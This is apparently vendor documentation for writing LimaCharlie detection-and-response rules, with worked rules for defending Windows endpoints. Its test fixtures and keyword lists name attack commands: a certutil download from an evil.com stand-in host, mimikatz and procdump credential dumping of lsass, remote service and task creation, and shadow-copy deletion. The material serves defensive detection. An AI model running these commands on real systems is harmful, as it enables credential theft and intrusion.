D&R Rule Building Guidebook

Table of Contents

1. Introduction
2. D&R Rule Fundamentals
3. Target Types
4. Detection Operators
5. Rule Structure & Configuration
6. Response Actions
7. Advanced Features
8. Cybersecurity Examples by Target Type
9. Complex Multi-Stage Rules
10. Performance Optimization
11. Best Practices
12. Troubleshooting

---

Introduction

LimaCharlie's Detection & Response (D&R) engine is a powerful, flexible system that enables real-time threat detection and automated response across multiple data sources. This guidebook provides comprehensive coverage of all D&R rule components, configuration options, and practical cybersecurity examples.

The D&R engine processes rules against various target types, supports complex stateful detection patterns, and can trigger sophisticated response actions. Understanding each component and how they interact is crucial for building effective security automation.

---

D&R Rule Fundamentals

Basic Structure

Every D&R rule consists of a detect section and an optional respond section:

detect:
  event: EVENT_TYPE
  op: <operator_name>
  path: <data_path>
  value: <comparison_value>

respond:
  - action: <action_name>

Core Concepts

• Path: Slash-separated selectors to extract data from events (e.g., event/FILE_PATH, routing/hostname)
• Operators: Logic operations for detection (is, contains, matches, etc.)
• Values: Comparison targets (static values, lookbacks, or sensor variables)
• Targets: Data sources the rule processes (edr, detection, artifact, etc.)

---

Target Types

D&R rules can process eight different target types, each with unique characteristics and use cases.

1. EDR Target (Default)

Purpose: Process telemetry events from LimaCharlie sensors. Data Source: Real-time endpoint events. Common Events: NEW_PROCESS, FILE_CREATE, NETWORK_CONNECTIONS, DNS_REQUEST, etc.

event: NEW_PROCESS
op: ends with
path: event/FILE_PATH
value: cmd.exe

2. Detection Target

Purpose: Process detections generated by other D&R rules (enables rule chaining). Data Source: Detection objects from previous rules. Use Cases: Alert escalation, correlation, suppression.

In the detection target, the event: parameter refers to the name of the detection specified in the original rule's report action.

target: detection
event: my-detection-name
op: is
path: routing/hostname
value: ceo-laptop

3. Deployment Target

Purpose: Process sensor lifecycle events. Data Source: Sensor enrollment, cloning, deletion, and quota events. Event Types: enrollment, sensor_clone, sensor_over_quota, deleted_sensor

target: deployment
event: enrollment
op: is windows

4. Artifact Target

Purpose: Process parsed artifacts collected via REST API or sensor commands. Data Source: Parsed log files, pcap data, and other collected artifacts. Use Cases: Log analysis, forensic investigation, compliance checking.

The artifact target supports a subset of operators and only supports the report response action.

target: artifact
artifact type: txt
artifact path: /var/log/auth.log
op: matches
re: .*(authentication failure|Failed password).*
path: /text
case sensitive: false

Special Parameters:

• artifact type: Matches the artifact's type string (e.g., pcap, zeek, txt, wel)
• artifact path: Matches the start of the artifact's path string
• artifact source: Matches the artifact's source string

5. Artifact Event Target

Purpose: Process lifecycle events around artifacts. Data Source: Artifact ingestion and export completion events. Event Types: ingest, export_complete

target: artifact_event
event: export_complete
op: starts with
path: routing/log_type
value: pcap
case sensitive: false

6. Schedule Target

Purpose: Process time-based triggered events at various intervals. Frequencies: Both _per_org and _per_sensor variants are available for each interval: 30m, 1h, 3h, 6h, 12h, 24h, 168h (7 days). For example: 1h_per_org, 1h_per_sensor, 24h_per_org, 24h_per_sensor, etc.

target: schedule
event: 1h_per_org
op: exists
path: event

7. Audit Target

Purpose: Process platform audit logs. Data Source: Tracks platform changes, tasking, replays, hive modifications, and other administrative actions.

target: audit
op: is
path: event/action
value: dr_rule_updated

8. Billing Target

Purpose: Process billing and quota events. Use Cases: Cost tracking, usage thresholds, budget alerting.

target: billing
event: billing_record
op: is
path: event/record/k
value: ext-strelka:bytes_scanned

---

Detection Operators

The D&R engine supports a comprehensive set of detection operators organized into categories.

String Operations

is - Exact Matching

Performs exact value comparison for strings, integers, and booleans.

op: is
path: event/FILE_PATH
value: "C:\\Windows\\System32\\calc.exe"
case sensitive: false

Supports the file name and sub domain transforms, lookbacks, and sensor variables.

contains - Substring Matching

Checks if a string contains a substring, with optional occurrence counting.

op: contains
path: event/COMMAND_LINE
value: "powershell"
case sensitive: false
count: 2

Parameters:

• case sensitive: Boolean (default: true)
• count: Minimum occurrences (default: 1)

Supports the file name and sub domain transforms.

starts with / ends with - Prefix/Suffix Matching

Checks string prefixes or suffixes.

op: starts with
path: event/FILE_PATH
value: "C:\\Users\\"
case sensitive: false

Supports the file name and sub domain transforms.

matches - Regular Expression

Pattern matching using regular expressions (Golang regexp syntax).

op: matches
path: event/FILE_PATH
re: .*\\system32\\.*\.scr
case sensitive: false

Important: The regex pattern is specified using the re: parameter, not value:.

Note: The matches operator defaults to case-insensitive matching unless case sensitive: true is explicitly set. This is the opposite of other operators like is and contains, which default to case-sensitive.

Supports the file name and sub domain transforms.

Logical Operations

and - Logical AND

All sub-rules must match.

op: and
rules:
  - op: ends with
    path: event/FILE_PATH
    value: powershell.exe
    case sensitive: false
  - op: contains
    path: event/COMMAND_LINE
    value: "-encodedcommand"
    case sensitive: false

or - Logical OR

Any sub-rule must match.

op: or
rules:
  - op: contains
    path: event/COMMAND_LINE
    value: "mimikatz"
  - op: contains
    path: event/COMMAND_LINE
    value: "sekurlsa"

not - Negation

Applied as a parameter on any operator to invert its result.

op: is
path: event/FILE_PATH
value: "svchost.exe"
file name: true
not: true

When applied to and/or, it inverts the combined result. For example, op: or with not: true means "none of these conditions are true."

Existence & Structure

exists - Path Existence

Checks if a path exists in the event data. Optionally validates non-empty values with truthy.

op: exists
path: event/PARENT
truthy: true

When truthy: true is set, null and empty string values are treated as non-existent.

scope - Scoped Evaluation

Resets the root of event/ in paths to be a sub-path, allowing evaluation of individual elements in lists or dicts.

op: scope
path: event/NETWORK_ACTIVITY/
rule:
  op: and
  rules:
    - op: starts with
      path: event/SOURCE/IP_ADDRESS
      value: '10.'
    - op: is
      path: event/DESTINATION/PORT
      value: 445

Important: The scope operator uses rule: (singular), not rules:.

Comparison Operations

is greater than / is lower than - Numeric Comparison

Compares numeric values. Supports length of to compare string lengths instead.

op: is greater than
path: event/COMMAND_LINE
value: 1000
length of: true

string distance - Levenshtein Distance

Measures string similarity using edit distance. The value parameter can be a single string or a list of strings.

op: string distance
path: event/DOMAIN_NAME
value:
  - onephoton.com
  - www.onephoton.com
max: 2

Supports the file name and sub domain transforms.

Platform Detection

is platform - Platform Matching

Checks if the event originates from a sensor of the given platform.

op: is platform
name: windows

Shorthand operators are also available for common platforms:

• is windows, is linux, is mac, is chrome, is net
• is 32 bit, is 64 bit, is arm
• is text, is json, is gcp, is carbon_black

op: and
rules:
  - op: is windows
  - op: contains
    path: event/COMMAND_LINE
    value: "reg add HKLM"

See the Detection Logic Operators reference for the full list of supported platform names.

IP Address Operations

cidr - IP Range Matching

Matches IP addresses against CIDR ranges.

op: cidr
path: event/NETWORK_ACTIVITY/SOURCE/IP_ADDRESS
cidr: 10.16.1.0/24

Important: The CIDR range is specified using the cidr: parameter, not value:.

is public address / is private address - IP Classification

Classifies IP addresses as public or private. Supports both IPv4 and IPv6. Specialized variants are also available: is public ipv4 address, is public ipv6 address, is private ipv4 address, is private ipv6 address.

op: is public address
path: event/NETWORK_ACTIVITY/DESTINATION/IP_ADDRESS

Tag & Lookup Operations

is tagged - Sensor Tag Checking

Checks if the sensor that generated the event has a specific tag.

op: is tagged
tag: "critical_server"

lookup - External Resource Integration

Looks up a value against a lookup resource such as a threat feed.

op: lookup
path: event/DOMAIN_NAME
resource: hive://lookup/malwaredomains
case sensitive: false

Resources are of the form hive://lookup/RESOURCE_NAME. The organization must be subscribed to the lookup to use it.

Supports the file name and sub domain transforms.

Transforms

file name - Filename Extraction

Extracts the filename component from a full path.

op: is
path: event/FILE_PATH
value: "svchost.exe"
file name: true

A path of c:\windows\system32\svchost.exe becomes svchost.exe.

sub domain - Domain Component Extraction

Extracts specific components from a domain name using slice notation.

op: is
path: event/DOMAIN_NAME
value: "evil.com"
sub domain: "-2:"

Slice notation examples:

• 0:2 — first 2 components: aa.bb from aa.bb.cc.dd
• -1 — last component: cc from aa.bb.cc
• 1: — all from index 1: bb.cc from aa.bb.cc
• : — test each component individually

is older than - Age Comparison

Tests if a timestamp value is older than a specified number of seconds.

op: is older than
path: routing/event_time
seconds: 3600

Important: The age is specified in the seconds: parameter as an integer, not as a duration string.

---

Rule Structure & Configuration

Event Filtering

event / events - Event Type Filter

Restricts the rule to specific event types for performance. Always specify event types when possible to reduce processing overhead.

# Single event type
event: NEW_PROCESS

# Multiple event types
events:
  - NEW_PROCESS
  - EXISTING_PROCESS

Stateful Detection Parameters

Enable complex multi-event correlation:

with child - Immediate Children

Matches events from immediate child processes.

event: NEW_PROCESS
op: ends with
path: event/FILE_PATH
value: cmd.exe
case sensitive: false
with child:
  event: NEW_PROCESS
  op: ends with
  path: event/FILE_PATH
  value: calc.exe
  case sensitive: false

with descendant - Any Descendants

Matches events from any descendant process (children, grandchildren, etc.).

event: NEW_PROCESS
op: ends with
path: event/FILE_PATH
value: outlook.exe
case sensitive: false
with descendant:
  op: or
  rules:
    - op: ends with
      event: NEW_PROCESS
      path: event/FILE_PATH
      value: powershell.exe
      case sensitive: false
    - op: ends with
      event: NEW_PROCESS
      path: event/FILE_PATH
      value: cmd.exe
      case sensitive: false

with events - Proximal Event Detection

Detects repetition of events close together on the same sensor.

event: WEL
op: is windows
with events:
  event: WEL
  op: is
  path: event/EVENT/System/EventID
  value: '4625'
  count: 5
  within: 60

Stateful Parameters

• count: Required number of matches (default: 1)
• within: Time window in seconds
• report latest event: true: Report the final event in the chain instead of the initial event

Time-Based Parameters

times - Time Restrictions

Restricts rule execution to specific time periods. Uses numeric day-of-week (1-7, where 1 = Sunday and 7 = Saturday) and 24-hour time (0-2359).

event: NEW_PROCESS
op: ends with
path: event/FILE_PATH
value: chrome.exe
case sensitive: false
times:
  - day_of_week_start: 2
    day_of_week_end: 6
    time_of_day_start: 2200
    time_of_day_end: 2359
    tz: America/Los_Angeles
  - day_of_week_start: 2
    day_of_week_end: 6
    time_of_day_start: 0
    time_of_day_end: 500
    tz: America/Los_Angeles

The tz value should be a TZ database name.

is stateless - Disable Stateful Tracking

Within a stateful rule (with child, with descendant), forces an operator and its children to match a single event rather than across multiple events.

with child:
  op: and
  is stateless: true
  rules:
    - op: ends with
      event: NEW_PROCESS
      path: event/FILE_PATH
      value: evil.exe
      case sensitive: false
    - op: contains
      path: event/COMMAND_LINE
      value: something-else
      case sensitive: false

Value Modifiers

Lookbacks

Use <<path>> syntax to compare against a value from elsewhere in the same event:

op: is
path: event/DESTINATION/IP_ADDRESS
value: <<event/SOURCE/IP_ADDRESS>>

Sensor Variables

Use [[variable_name]] syntax to compare against values stored in a sensor variable:

op: is
path: event/FILE_PATH
value: '[[known-good-processes]]'

Variables are set using the add var response action and can hold multiple values. The operator checks if the value at path matches any value in the variable.

---

Response Actions

Response actions define what happens when a rule detects a match. Multiple actions can be chained together.

report - Generate Detection

Creates a detection (alert) that is sent to the detection output stream, the Detections page, and the D&R rule engine for chaining.

- action: report
  name: my-detection-name
  priority: 3
  metadata:
    author: Alice
    technique: T1059.001

Parameters:

• name: Detection name (supports template strings). Prefix with __ to hide from Outputs but remain visible to chained rules.
• publish: Boolean (default: true)
• priority: Integer priority level
• metadata: Free-form key-value data (appears as detect_mtd in the detection)
• detect_data: Free-form field for extracting specific elements into a known format

The name, metadata, and detect_data parameters support template strings. Note that the template context is the detection itself, so use .detect.event.USER_NAME not .event.USER_NAME.

output - Data Routing

Forwards the matched event to a specific Output in the tailored stream.

- action: output
  name: my-siem-output

task - Execute Sensor Commands

Sends a command to the sensor that generated the event.

- action: task
  command: history_dump
  investigation: susp-process-inv

Parameters:

• command: The sensor command to execute (supports template strings, e.g., artifact_get {{ .event.FILE_PATH }})
• investigation: Optional unique identifier for the task and resulting events

See Endpoint Commands for all available commands.

add tag / remove tag - Sensor Tagging

Manages sensor tags for organization and targeting.

- action: add tag
  tag: compromised
  ttl: 86400
  entire_device: false

Parameters:

• tag: Tag name
• ttl: Optional, seconds until the tag expires
• entire_device: Optional boolean; when true, applies the tag to all sensors sharing the same Device ID

add var / del var - Sensor Variables

Manages sensor-specific variables for cross-rule state tracking.

- action: add var
  name: last_incident
  value: <<routing/this>>
  ttl: 604800

Parameters:

• name: Variable name
• value: Value to store (supports lookback <<path>> syntax)
• ttl: Optional, seconds until the variable expires

Variables set here can be referenced in detection rules using [[variable_name]] syntax. See Sensor Variables for detailed usage.

isolate network / rejoin network - Network Control

Controls sensor network connectivity for containment. Isolation is persistent (survives reboots).

- action: isolate network

- action: rejoin network

seal / unseal - Tamper Resistance

Controls sensor tamper resistance. Sealing is persistent (survives reboots).

- action: seal

- action: unseal

undelete sensor - Sensor Recovery

Restores a previously deleted sensor. Often used with the deleted_sensor deployment event.

- action: undelete sensor

extension request - External Extensions

Calls external extensions and integrations asynchronously.

- action: extension request
  extension name: slack-alerts
  extension action: send_message
  extension request:
    channel: '#security-alerts'
    message: 'Detection: {{ .detect.name }}'

Parameters:

• extension name: Name of the extension
• extension action: Action to trigger
• extension request: Request parameters (varies by extension, supports template transforms)
• based on report: Optional boolean; when true, the transform is based on the latest report action's output instead of the original event (requires a preceding report action)

wait - Introduce Delays

Adds a delay (up to 1 minute) before the next response action. Blocks sensor event processing for the specified duration.

- action: wait
  duration: 10s

Parameters:

• duration: A duration string (e.g., 5s, 10ms) or an integer representing seconds

add hive tag / remove hive tag - Hive Record Tagging

Manages tags on Hive records (e.g., D&R rules).

- action: add hive tag
  hive name: dr-general
  record name: my-rule
  tag: high-hit

start ai agent - AI-Driven Response

Spawns a Claude AI session for automated investigation and response. Supports two modes:

Inline Mode:

- action: start ai agent
  prompt: "Investigate this detection and provide a summary..."
  anthropic_secret: hive://secret/my-anthropic-key

Definition Mode:

- action: start ai agent
  definition: hive://ai_agent/my-triage-bot
  debounce_key: "triage-{{ .routing.sid }}"

See AI Sessions for full configuration options.

Suppression

All response actions support suppression to manage repetitive or noisy alerts.

- action: report
  name: evil-process-detected
  suppression:
    max_count: 1
    period: 1h
    is_global: true
    keys:
      - '{{ .event.FILE_PATH }}'
      - 'evil-process-detected'

Parameters:

• max_count: Maximum action executions per period
• min_count: Minimum threshold before executing (requires both min_count and max_count)
• period: Time window using duration format (ns, us, ms, s, m, h)
• is_global: true for organization-wide suppression, false for per-sensor
• keys: List of strings that form the uniqueness key (supports templates)
• count_path: Path to an integer in the event for variable-count increments

Key templates support three namespaces:

• {{ .event.* }} — fields from the event payload
• {{ .routing.* }} — routing metadata (sid, hostname, etc.)
• {{ .mtd.* }} — metadata from lookup operators (e.g., GeoIP country)

---

Advanced Features

Stateful Detection

The D&R engine supports sophisticated stateful detection patterns that track relationships and correlations across multiple events.

Process Tree Tracking

Track relationships between parent and child processes:

event: NEW_PROCESS
op: ends with
path: event/FILE_PATH
value: cmd.exe
case sensitive: false
with child:
  event: NEW_PROCESS
  op: and
  rules:
    - op: ends with
      path: event/FILE_PATH
      value: powershell.exe
      case sensitive: false
    - op: contains
      path: event/COMMAND_LINE
      value: "-windowstyle hidden"
      case sensitive: false

event: NEW_PROCESS
op: ends with
path: event/FILE_PATH
value: winword.exe
case sensitive: false
with descendant:
  op: or
  rules:
    - op: ends with
      event: NEW_PROCESS
      path: event/FILE_PATH
      value: powershell.exe
      case sensitive: false
    - op: ends with
      event: NEW_PROCESS
      path: event/FILE_PATH
      value: cmd.exe
      case sensitive: false

Temporal Correlation

Correlate events across time windows:

event: NEW_PROCESS
op: ends with
path: event/FILE_PATH
value: outlook.exe
case sensitive: false
with child:
  event: NEW_DOCUMENT
  op: ends with
  path: event/FILE_PATH
  value: .ps1
  case sensitive: false
  count: 5
  within: 60

Behavioral Detection Patterns

First-Seen Detection

Use suppression with max_count: 1 and a long period to detect first occurrences:

detect:
  event: USER_LOGIN
  op: lookup
  path: event/SOURCE_IP
  resource: lcr://api/ip-geo

respond:
  - action: report
    name: first-login-from-country
    suppression:
      max_count: 1
      period: 720h
      is_global: true
      keys:
        - 'first-country'
        - '{{ .event.USER_NAME }}'
        - '{{ .mtd.lcr___api_ip_geo.country.iso_code }}'

Threshold Activation

Alert only after a certain number of occurrences using min_count:

- action: report
  name: high-alert-frequency
  suppression:
    min_count: 3
    max_count: 3
    period: 24h

Template System

Templates enable dynamic content generation in response actions using Go template syntax:

- action: report
  name: "detected {{ .detect.event.FILE_PATH }} on {{ .routing.hostname }}"
  metadata:
    sensor_id: "{{ .routing.sid }}"

Template Functions

• {{ token .value }} — MD5 hash
• {{ json .object }} — JSON marshal
• {{ prettyjson .object }} — Formatted JSON
• {{ split "," .value }} — String split
• {{ join "," .list }} — String join
• {{ replace "old" "new" .value }} — String replace
• {{ base .path }} — Filename from path
• {{ dir .path }} — Directory from path

See Template Strings for the full reference.

Resource Integration

Lookup Resources

Integrate external threat intelligence and reference data:

op: lookup
path: event/DOMAIN_NAME
resource: hive://lookup/threat_intel
case sensitive: false

YARA Resources (Artifact Target)

Apply YARA rules to artifact content:

target: artifact
artifact type: file
detect:
  op: yara
  resource: hive://yara/malware_rules

---

Cybersecurity Examples by Target Type

This section provides real-world cybersecurity examples for each target type.

EDR Target Examples

Example 1: Living-off-the-Land Attack Detection

detect:
  event: NEW_PROCESS
  op: and
  rules:
    - op: is windows

    - op: or
      rules:
        - op: is
          path: event/FILE_PATH
          value: certutil.exe
          file name: true
        - op: is
          path: event/FILE_PATH
          value: bitsadmin.exe
          file name: true
        - op: is
          path: event/FILE_PATH
          value: wmic.exe
          file name: true

    - op: or
      rules:
        - op: contains
          path: event/COMMAND_LINE
          value: "-urlcache"
          case sensitive: false
        - op: contains
          path: event/COMMAND_LINE
          value: "/transfer"
          case sensitive: false
        - op: matches
          path: event/COMMAND_LINE
          re: "https?://[^\\s]+"

respond:
  - action: report
    name: lolbin-abuse-detected
    priority: 3
    metadata:
      technique: T1105
      description: Detects abuse of legitimate Windows utilities for downloading

tests:
  match:
    - - event:
          FILE_PATH: C:\Windows\System32\certutil.exe
          COMMAND_LINE: certutil -urlcache -split -f https://evil.com/payload.exe C:\temp\payload.exe
        routing:
          event_type: NEW_PROCESS
          hostname: workstation01
          plat: 268435456
          arch: 2
  non_match:
    - - event:
          FILE_PATH: C:\Windows\System32\certutil.exe
          COMMAND_LINE: certutil -hashfile C:\file.txt SHA256
        routing:
          event_type: NEW_PROCESS
          hostname: workstation01
          plat: 268435456
          arch: 2

Example 2: Office Application Spawning Shell

detect:
  event: NEW_PROCESS
  op: or
  rules:
    - op: ends with
      path: event/FILE_PATH
      value: winword.exe
      case sensitive: false
    - op: ends with
      path: event/FILE_PATH
      value: excel.exe
      case sensitive: false
    - op: ends with
      path: event/FILE_PATH
      value: powerpnt.exe
      case sensitive: false
  with child:
    event: NEW_PROCESS
    op: or
    rules:
      - op: ends with
        path: event/FILE_PATH
        value: powershell.exe
        case sensitive: false
      - op: ends with
        path: event/FILE_PATH
        value: cmd.exe
        case sensitive: false
      - op: ends with
        path: event/FILE_PATH
        value: wscript.exe
        case sensitive: false

respond:
  - action: report
    name: office-app-spawning-shell
    priority: 3
    metadata:
      technique: T1204.002
      description: Office application spawning suspicious child process

  - action: add tag
    tag: suspicious-office-activity
    ttl: 3600

Example 3: Credential Harvesting Detection

detect:
  event: NEW_PROCESS
  op: and
  rules:
    - op: is windows
    - op: or
      rules:
        - op: contains
          path: event/COMMAND_LINE
          value: mimikatz
          case sensitive: false
        - op: contains
          path: event/COMMAND_LINE
          value: sekurlsa
          case sensitive: false
        - op: and
          rules:
            - op: contains
              path: event/COMMAND_LINE
              value: lsass
              case sensitive: false
            - op: contains
              path: event/COMMAND_LINE
              value: dump
              case sensitive: false
        - op: and
          rules:
            - op: is
              path: event/FILE_PATH
              value: procdump.exe
              file name: true
            - op: contains
              path: event/COMMAND_LINE
              value: lsass
              case sensitive: false

respond:
  - action: report
    name: credential-harvesting-activity
    priority: 1
    metadata:
      technique: T1003
      description: Credential harvesting tool or technique detected

  - action: isolate network

  - action: add tag
    tag: credential-theft-detected
    ttl: 86400

tests:
  match:
    - - event:
          FILE_PATH: C:\Users\attacker\mimikatz.exe
          COMMAND_LINE: mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
        routing:
          event_type: NEW_PROCESS
          hostname: workstation01
          plat: 268435456
          arch: 2
    - - event:
          FILE_PATH: C:\Windows\System32\procdump.exe
          COMMAND_LINE: procdump.exe -ma lsass.exe lsass.dmp
        routing:
          event_type: NEW_PROCESS
          hostname: workstation01
          plat: 268435456
          arch: 2
  non_match:
    - - event:
          FILE_PATH: C:\Windows\System32\notepad.exe
          COMMAND_LINE: notepad.exe C:\temp\notes.txt
        routing:
          event_type: NEW_PROCESS
          hostname: workstation01
          plat: 268435456
          arch: 2

Example 4: Lateral Movement Detection

detect:
  event: NEW_PROCESS
  op: and
  rules:
    - op: is windows
    - op: or
      rules:
        - op: and
          rules:
            - op: is
              path: event/FILE_PATH
              value: sc.exe
              file name: true
            - op: matches
              path: event/COMMAND_LINE
              re: "\\\\\\\\[^\\s]+\\s+create"
              case sensitive: false
        - op: and
          rules:
            - op: is
              path: event/FILE_PATH
              value: schtasks.exe
              file name: true
            - op: contains
              path: event/COMMAND_LINE
              value: "/create"
              case sensitive: false
            - op: matches
              path: event/COMMAND_LINE
              re: "/s(ystem)?\\s+\\S+"
        - op: and
          rules:
            - op: is
              path: event/FILE_PATH
              value: wmic.exe
              file name: true
            - op: contains
              path: event/COMMAND_LINE
              value: "/node:"
              case sensitive: false
            - op: contains
              path: event/COMMAND_LINE
              value: "process call create"
              case sensitive: false

respond:
  - action: report
    name: lateral-movement-attempt
    priority: 2
    metadata:
      technique: T1021
      description: Lateral movement attempt using Windows administrative tools

  - action: add tag
    tag: lateral-movement-source
    ttl: 3600

tests:
  match:
    - - event:
          FILE_PATH: C:\Windows\System32\wmic.exe
          COMMAND_LINE: wmic /node:192.168.1.50 process call create "cmd.exe /c whoami"
        routing:
          event_type: NEW_PROCESS
          hostname: workstation01
          plat: 268435456
          arch: 2
    - - event:
          FILE_PATH: C:\Windows\System32\sc.exe
          COMMAND_LINE: sc \\remotehost create evil-svc binpath= c:\evil.exe
        routing:
          event_type: NEW_PROCESS
          hostname: workstation01
          plat: 268435456
          arch: 2
    - - event:
          FILE_PATH: C:\Windows\System32\schtasks.exe
          COMMAND_LINE: schtasks /create /s REMOTE01 /tn evil /tr c:\evil.exe
        routing:
          event_type: NEW_PROCESS
          hostname: workstation01
          plat: 268435456
          arch: 2
  non_match:
    - - event:
          FILE_PATH: C:\Windows\System32\wmic.exe
          COMMAND_LINE: wmic os get caption
        routing:
          event_type: NEW_PROCESS
          hostname: workstation01
          plat: 268435456
          arch: 2
    - - event:
          FILE_PATH: C:\Windows\System32\sc.exe
          COMMAND_LINE: sc query MyService
        routing:
          event_type: NEW_PROCESS
          hostname: workstation01
          plat: 268435456
          arch: 2
    - - event:
          FILE_PATH: C:\Windows\System32\schtasks.exe
          COMMAND_LINE: schtasks /create /tn localtask /tr notepad.exe
        routing:
          event_type: NEW_PROCESS
          hostname: workstation01
          plat: 268435456
          arch: 2

Detection Target Examples

Detection rules process alerts generated by other D&R rules, enabling alert correlation, escalation, and suppression.

Example 5: VIP Endpoint Escalation

detect:
  target: detection
  event: virus-total-hit
  op: is
  path: routing/hostname
  value: ceo-laptop

respond:
  - action: report
    name: vip-endpoint-alert
    priority: 1
    metadata:
      escalation_reason: Detection on VIP endpoint

  - action: extension request
    extension name: pagerduty
    extension action: run
    extension request:
      severity: '{{ "critical" }}'
      summary: '{{ "Alert on VIP endpoint" }}'

Example 6: Alert Threshold Escalation

detect:
  target: detection
  op: is
  path: cat
  value: credential-harvesting-activity

respond:
  - action: report
    name: repeated-credential-harvesting
    suppression:
      min_count: 3
      max_count: 3
      period: 1h
      is_global: false
      keys:
        - '{{ .routing.sid }}'
        - 'credential-harvest-escalation'

Deployment Target Examples

Example 7: Sensor Clone Auto-Remediation

detect:
  target: deployment
  event: sensor_clone
  op: is windows

respond:
  - action: task
    command: file_del %windir%\system32\hcp.dat
  - action: task
    command: file_del %windir%\system32\hcp_hbs.dat
  - action: task
    command: file_del %windir%\system32\hcp_conf.dat
  - action: task
    command: restart

Example 8: Deleted Sensor Recovery

detect:
  target: deployment
  event: deleted_sensor
  op: is
  path: routing/event_type
  value: deleted_sensor

respond:
  - action: undelete sensor

Artifact Target Examples

Example 9: Failed Auth Log Detection

detect:
  target: artifact
  artifact type: txt
  artifact path: /var/log/auth.log
  op: matches
  re: .*(authentication failure|Failed password).*
  path: /text
  case sensitive: false

respond:
  - action: report
    name: failed-auth-detected

Example 10: Windows Event Log Analysis

detect:
  target: artifact
  artifact type: wel
  op: and
  rules:
    - op: is
      path: event/EVENT/System/EventID
      value: '4688'
    - op: contains
      path: event/EVENT/EventData/CommandLine
      value: powershell
      case sensitive: false
    - op: contains
      path: event/EVENT/EventData/CommandLine
      value: "-enc"
      case sensitive: false

respond:
  - action: report
    name: encoded-powershell-in-logs
    metadata:
      technique: T1059.001

Artifact Event Target Example

Example 11: PCAP Export Notification

detect:
  target: artifact_event
  event: export_complete
  op: starts with
  path: routing/log_type
  value: pcap
  case sensitive: false

respond:
  - action: report
    name: pcap-artifact-ready

---

Complex Multi-Stage Rules

Example 12: Office Macro to Persistence Chain

This rule detects an Office application spawning a shell that then establishes persistence:

detect:
  event: NEW_PROCESS
  op: or
  rules:
    - op: ends with
      path: event/FILE_PATH
      value: winword.exe
      case sensitive: false
    - op: ends with
      path: event/FILE_PATH
      value: excel.exe
      case sensitive: false
  with descendant:
    event: NEW_PROCESS
    op: or
    rules:
      - op: and
        rules:
          - op: is
            path: event/FILE_PATH
            value: schtasks.exe
            file name: true
          - op: contains
            path: event/COMMAND_LINE
            value: /create
            case sensitive: false
      - op: and
        rules:
          - op: is
            path: event/FILE_PATH
            value: sc.exe
            file name: true
          - op: contains
            path: event/COMMAND_LINE
            value: create
            case sensitive: false
      - op: and
        rules:
          - op: is
            path: event/FILE_PATH
            value: reg.exe
            file name: true
          - op: contains
            path: event/COMMAND_LINE
            value: CurrentVersion\Run
            case sensitive: false

respond:
  - action: report
    name: office-macro-to-persistence
    priority: 1
    metadata:
      technique: TA0001,TA0003
      description: Office app spawned process that established persistence

  - action: isolate network

  - action: add tag
    tag: macro-persistence-detected
    ttl: 86400

Example 13: Ransomware Behavior Detection

Detects ransomware-like behavior: a process deleting shadow copies (common pre-encryption step).

detect:
  event: NEW_PROCESS
  op: is windows
  with child:
    event: NEW_PROCESS
    op: or
    rules:
      - op: and
        rules:
          - op: is
            path: event/FILE_PATH
            value: vssadmin.exe
            file name: true
          - op: contains
            path: event/COMMAND_LINE
            value: "delete shadows"
            case sensitive: false
      - op: and
        rules:
          - op: is
            path: event/FILE_PATH
            value: wmic.exe
            file name: true
          - op: contains
            path: event/COMMAND_LINE
            value: "shadowcopy delete"
            case sensitive: false
      - op: and
        rules:
          - op: is
            path: event/FILE_PATH
            value: bcdedit.exe
            file name: true
          - op: contains
            path: event/COMMAND_LINE
            value: "recoveryenabled no"
            case sensitive: false
  report latest event: true

respond:
  - action: report
    name: ransomware-shadow-deletion
    priority: 1
    metadata:
      technique: T1490
      description: Shadow copy deletion or recovery disabling detected

  - action: isolate network

  - action: task
    command: deny_tree <<routing/parent>>

  - action: add tag
    tag: ransomware-activity
    ttl: 86400

Example 14: Brute Force Detection with AI Triage

Detects brute force login attempts and spawns an AI agent for investigation.

detect:
  event: WEL
  op: is windows
  with events:
    event: WEL
    op: is
    path: event/EVENT/System/EventID
    value: '4625'
    count: 10
    within: 300

respond:
  - action: report
    name: brute-force-detected
    priority: 2
    metadata:
      technique: T1110
      description: Multiple failed login attempts detected

  - action: start ai agent
    definition: hive://ai_agent/l1-triage-bot
    debounce_key: "brute-force-{{ .routing.sid }}"

---

Performance Optimization

Rule Efficiency Guidelines

Event Filtering

Always specify event types to reduce processing overhead:

# Good — specific event filtering
event: NEW_PROCESS

# Poor — processes all events (no event specification)

Operator Selection

Choose the most specific operator:

# Good — exact match when possible
op: is
path: event/FILE_PATH
value: powershell.exe
file name: true

# Less efficient for exact matches
op: contains
path: event/COMMAND_LINE
value: powershell.exe

Path Optimization

Use direct paths:

# Efficient
path: event/COMMAND_LINE

# Less efficient — wildcards and deep nesting
path: event/NETWORK_ACTIVITY/?/SIGNATURES/?/ISSUER

Stateless Where Possible

Use is stateless: true within stateful rules when correlation isn't needed for a specific sub-rule.

Suppression Best Practices

Effective Suppression Keys

Use specific, meaningful suppression keys:

suppression:
  keys:
    - '{{ .routing.sid }}'
    - '{{ .event.FILE_PATH }}'
    - 'my-rule-name'
  max_count: 5
  period: 1h

Time-Based Suppression

Adjust suppression periods based on detection criticality:

# Frequent, low-priority events — longer suppression
suppression:
  period: 6h
  max_count: 10

# Critical events — shorter suppression
suppression:
  period: 15m
  max_count: 2

---

Best Practices

Rule Design Principles

1. Start simple: Begin with basic detection logic and add complexity incrementally.
2. Specify event types: Always use the event: parameter to limit which events trigger the rule.
3. Test thoroughly: Use the tests parameter with match and non_match cases to validate rule logic.
4. Document with metadata: Use the metadata field on report actions to include MITRE technique IDs, descriptions, and context.
5. Handle alert fatigue: Implement appropriate suppression on report actions.
6. Use case sensitive: false: For file paths and command lines, case-insensitive matching avoids missed detections.

Response Action Guidelines

1. Proportional response: Reserve aggressive actions (isolate network, deny_tree) for high-confidence detections.
2. Chain actions carefully: Use wait between dependent actions (e.g., after a task that needs to complete before the next step).
3. Use suppression on expensive actions: Avoid repeated network isolation or extension requests with proper suppression.
4. Template safely: Use conditional logic for fields that may not exist in all event types.

Operational Guidelines

1. Test before deploying: Unit tests run automatically when creating or updating rules — leverage them.
2. Use FP rules: Create false positive rules in the fp Hive to suppress known-good activity without modifying the detection.
3. Monitor rule performance: Use tags and suppression counters to track rule effectiveness.
4. Iterate: Refine rules based on real-world false positive and true positive rates.

---

Troubleshooting

Common Issues

Rule Not Triggering

• Check that the event: filter matches actual event types being generated.
• Verify path: selectors point to existing fields in the event data (use the schema API or timeline to inspect events).
